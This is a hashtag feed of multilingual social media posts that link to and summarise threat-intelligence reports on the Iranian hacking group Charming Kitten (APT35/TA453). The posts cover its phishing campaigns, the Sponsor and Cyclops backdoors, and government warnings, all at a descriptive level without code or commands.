How a hacking campaign targeted high-profile Gmail and WhatsApp users across the Middle East
#CharmingKitten #WhatsApp
https://techcrunch.com/2026/01/16/how-a-hacking-campaign-targeted-high-profile-gmail-and-whatsapp-users-across-the-middle-east/

APT35 Sızıntısı: Siber casusluktan fiziksel suikast planlarına
#apt35 #CharmingKitten #İran #nationstate

https://webrecord.media/apt35-sizintisi-siber-casusluktan-fiziksel-suikast-planlarina/

0day Browser RCE von Charming Kitten / APT35 oder schlechte Berichterstattung?

Angeblich wurde auf einen Link geklickt und dadurch™ der Rechner infiziert.

https://archive.is/QkX57

#Berlin #Badenberg #CharmingKitten #apt35

Hannah Neumann ist Vorsitzende der Iran-Delegation im EU-Parlament. Sie kämpft für Demokratie. Jetzt wurde sie Ziel eines Hackerangriffs. Das ist ein direkter Angriff auf unsere Werte. Wer schweigt, macht sich mitschuldig. #Iran #Demokratie #EUParlament #CharmingKitten #EinfacheSprache

Iran greift nicht nur sein eigenes Volk an. Jetzt auch EU-Politiker. Die Hackergruppe „Charming Kitten“ wollte Hannah Neumann ausspionieren. Warum? Weil sie sich für Freiheit und Menschenrechte einsetzt. Wer so handelt, zeigt, wie gefährlich Diktaturen sind. #Iran #CharmingKitten #Neumann #EU #EinfacheSprache

BellaCiao,BellaCiao from the magic hound to the poor sod who's account is browned the magic that with the new year comes spies and hounds and hides it's crumbs whether social media or email links do not click if it blinks or stinks thehackernews.com/2024/12/iran... #apt35 #charmingkitten #magichound

New APT insight from Proofpoint ⬇️

This week, our team observed IRGC/Iraninan-aligned threat group #TA453 continue their phishing efforts despite the recent unsealing of indictments and sanctions by the U.S. government.

Specifically, Proofpoint observed TA453 masquerade as the Centre for Feminist Foreign Policy (CFFP) to target individuals associated with U.S. based universities, media companies, and politically adjacent social benefit organizations.

Today #CISA and the @FBI released a resource guide titled, “How to Protect Against Iranian Targeting of Accounts Associated with National Political Organizations.” It sets a good baseline on ways to protect against a variety of threat actors, including TA453. https://www.cisa.gov/resources-tools/resources/how-protect-against-iranian-targeting-accounts-associated-national-political-organizations

TA453 overlaps with reporting on #CharmingKitten, #MintSandstorm, #CharmingCypress and #APT42.

See our recent blog post to learn more about TA453’s malware evolution. https://ow.ly/OrXE50THoKZ

Iranian Cyber Actors Targeting Personal Accounts to Support Operations
#CharmingKitten
https://www.ic3.gov/Media/News/2024/240927.pdf

The Iran-aligned threat actor who compromised the Trump campaign's email systems is known in the cybersecurity research community as #TA453, #APT42, or #CharmingKitten.

"The group's appearance in the U.S. election is noteworthy, sources told @Reuters, because of their invasive #espionage approach against high-value targets in Washington and Israel."

Read the article for insights from Joshua Miller of Proofpoint and other experts: https://www.reuters.com/world/trump-campaigns-iranian-hackers-have-dangerous-history-deep-expertise-2024-08-23/

Cyclops: a likely replacement for BellaCiao
#CharmingKitten #BellaCiao #Cyclops
https://harfanglab.io/insidethelab/cyclops-replacement-bellaciao/

Our team just released a report on #CharmingKitten/#APT35: https://harfanglab.io/insidethelab/cyclops-replacement-bellaciao/

We discovered a new malware family called Cyclops, written in Go. It launches a local web server which exposes a REST API used to control the malware. The port is forwarded to the C2 via SSH.

We believe Cyclops was developed as a replacement for the (burnt) BellaCiao implant.
There seem to be very few samples in existence and we'd be curious to know if anyone else can find some. Suspected area of activity is the Middle-East since December 2023.

Reverse-engineering was a challenge due to the malware expecting mashalled objects from the network. How do you figure out their expected structure with Golang when there's no constructor? If there's any interest, I may write a separate blog post or thread on the subject.

IOCs and more in the full post. Enjoy!

📬 Die stille Gefahr: Wie APT-Gruppen Unternehmen infiltrieren
#Datenschutz #ITSicherheit #AdvancedPersistentThreats #APTGruppe #CharmingKitten #FancyBear #Lazarus #SolarWinds https://sc.tarnkappe.info/db4898

Happy Thursday everyone!

The Volexity team share their findings from a recent incident that involved the APT known as #CharmingKitten (aka #CharmingCypress) and what lengths this group went to make their attack look as convincing as possible. The Volexity team also shared technical details about the malware that was used, specific commands seen, and TTPs used. Enjoy and Happy Hunting!

CharmingCypress: Innovating Persistence
https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/

As always, I don't want to leave you empty handed! So take this Community Hunt Package from Cyborg Security to help you identify discovery behavior from adversaries!

Excessive Windows Discovery and Execution Processes - Potential Malware Installation
https://www.volexity.com/blog/2024/02/13/charmingcypress-innovating-persistence/

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday #huntoftheday #gethunting

"🌪️ Mint Sandstorm: Sophisticated Phishing Campaign Unleashed by APT35 🚨"

Microsoft's security blog reveals an intricate phishing campaign, "Mint Sandstorm," by the subgroup PHOSPHORUS (also known as APT35 and Charming Kitten), linked to Iran's Islamic Revolutionary Guard Corps. This campaign targets individuals in universities and research organizations involved in Middle Eastern affairs across various countries. Unique tactics include bespoke phishing lures, using compromised legitimate email accounts, and deploying custom backdoors like MediaPl and MischiefTut. These tools allow for encrypted communications, reconnaissance, and persistence in target environments. Microsoft suggests using Attack Simulator in Defender for Office 365, enabling SmartScreen on browsers, and activating cloud-delivered protection to mitigate risks.

Microsoft's security blog

Tags: #CyberSecurity #Phishing #APT35 #CharmingKitten #MintSandstorm #MicrosoftSecurity #InfoSec #ThreatIntelligence

Mitre - APT35

Iran's #CharmingKitten Pounces on Israeli #Exchange Servers

https://www.darkreading.com/dr-global/irans-charming-kitten-israeli-exchange-servers

"🔍 Charming Kitten Strikes with 'Sponsor' Malware! 🕵️"
The notorious APT group 'Charming Kitten' (also known as Phosphorus, TA453, APT35/42) has unveiled a new backdoor malware named 'Sponsor'. This malware has already targeted 34 global companies. Stay vigilant! 🌍🔥

A nation-state threat actor, known by various aliases including 'Charming Kitten,' 'Phosphorus,' 'TA453,' and 'APT35/42,' has recently executed a sophisticated cyber campaign using a previously undisclosed backdoor malware named 'Sponsor.' ESET researchers have identified this campaign, which targeted 34 companies worldwide between March 2021 and June 2022, encompassing government and healthcare organizations, financial services, engineering, manufacturing, technology, law, telecommunications, and more. The primary targets were located in Israel, Brazil, and the United Arab Emirates.

Key Findings:

1. Concealed Configuration Files: The 'Sponsor' backdoor is notable for its ability to hide configuration files on the victim's system, making it stealthy and difficult to detect. These files are deployed discreetly through malicious batch scripts.

2. Initial Access via Microsoft Exchange Vulnerability: The threat actor primarily exploited the CVE-2021-26855 vulnerability in Microsoft Exchange to gain initial access to targeted networks.

3. Tool Usage: Charming Kitten utilized various open-source tools for data exfiltration, system monitoring, network infiltration, and maintaining access to compromised computers.

4. Payload Deployment: Prior to deploying the 'Sponsor' backdoor, the attackers dropped batch files on specific file paths, creating seemingly innocuous files named config.txt, node.txt, and error.txt to avoid arousing suspicion.

5. Functionality of 'Sponsor' Backdoor: 'Sponsor' is a C++ backdoor that establishes a service upon launch based on instructions from the configuration file. The configuration file contains encrypted command and control (C2) server addresses, C2 contacting intervals, and the RC4 decryption key. The malware collects system information and sends it to the C2, receiving a unique node ID in return. It then enters a loop to receive and execute commands from the C2, including process ID reporting, command execution, file retrieval and execution, and more.

6. Disguised Second Version: ESET identified a second version of 'Sponsor' with code optimizations and camouflage features, making it appear as an updater tool.

7. Indicators of Compromise (IOCs): Although the IP addresses used in this campaign are no longer active, ESET has shared comprehensive IOCs to assist in defending against potential future threats that may reuse the tools or infrastructure deployed by Charming Kitten.

Organizations worldwide, particularly those in the targeted sectors and regions, should remain vigilant and ensure their cybersecurity defenses are up-to-date and capable of detecting advanced threats like 'Sponsor' used by nation-state actors like Charming Kitten. Regular patching and network monitoring are essential to mitigate such cyber risks.

Source: BleepingComputer.com
Mitre - Charming Kitten
Tags: #APT #CharmingKitten #SponsorMalware #CyberAttack

Sponsor, written in C++, is designed to gather crucial information from the compromised host and execute instructions received from the attackers’ remote server.

#Cybersecurity #CharmingKitten #APT #Backdoor

https://cybersec84.wordpress.com/2023/09/11/iranian-threat-actor-charming-kitten-launches-new-attack-campaign-targeting-brazil-israel-and-uae/

📬 Spionage im Internet: Verfassungsschutz warnt vor Charming Kitten
#Cyberangriffe #Geheimdienste #Bundesverfassungsschutz #CharmingKitten #CyberSpionage #Cyberabwehr #DrMansourSohrabi #Iran #JadranMesic #MikeHart https://tarnkappe.info/artikel/cyberangriff/spionage-im-internet-verfassungsschutz-warnt-vor-charming-kitten-279835.html

Verfassungsschutz: Iranische Hacker wollen Regimekritiker hierzulande ausspähen | heise online https://www.heise.de/news/Verfassungsschutz-Iranische-Hacker-wollen-Regimekritiker-hierzulande-ausspaehen-9240674.html #Phishing #CyberCrime #Hacking #SocialEngineneering #Iran 🇮🇷 #CharmingKitten

Nach Erkenntnissen des Bundesamtes für #Verfassungsschutz (#BfV) ist seit Ende 2022 von konkreten Ausspähversuchen der #APT-Gruppe #CharmingKitten gegen iranische Personen und Organisationen in Deutschland auszugehen.

Insbesondere warnt das BfV im "Cyber-Brief Nr. 01/2023" vom 10. August 23 vor #Phishing-Angriffen gegen #Dissidenten-Organisationen und Einzelpersonen – wie Juristen, Journalisten oder #Menschenrechtsaktivisten – innerhalb und außerhalb des #Iran.

https://www.verfassungsschutz.de/SharedDocs/kurzmeldungen/DE/2023/2023-08-10-cyber-brief-01-2023.html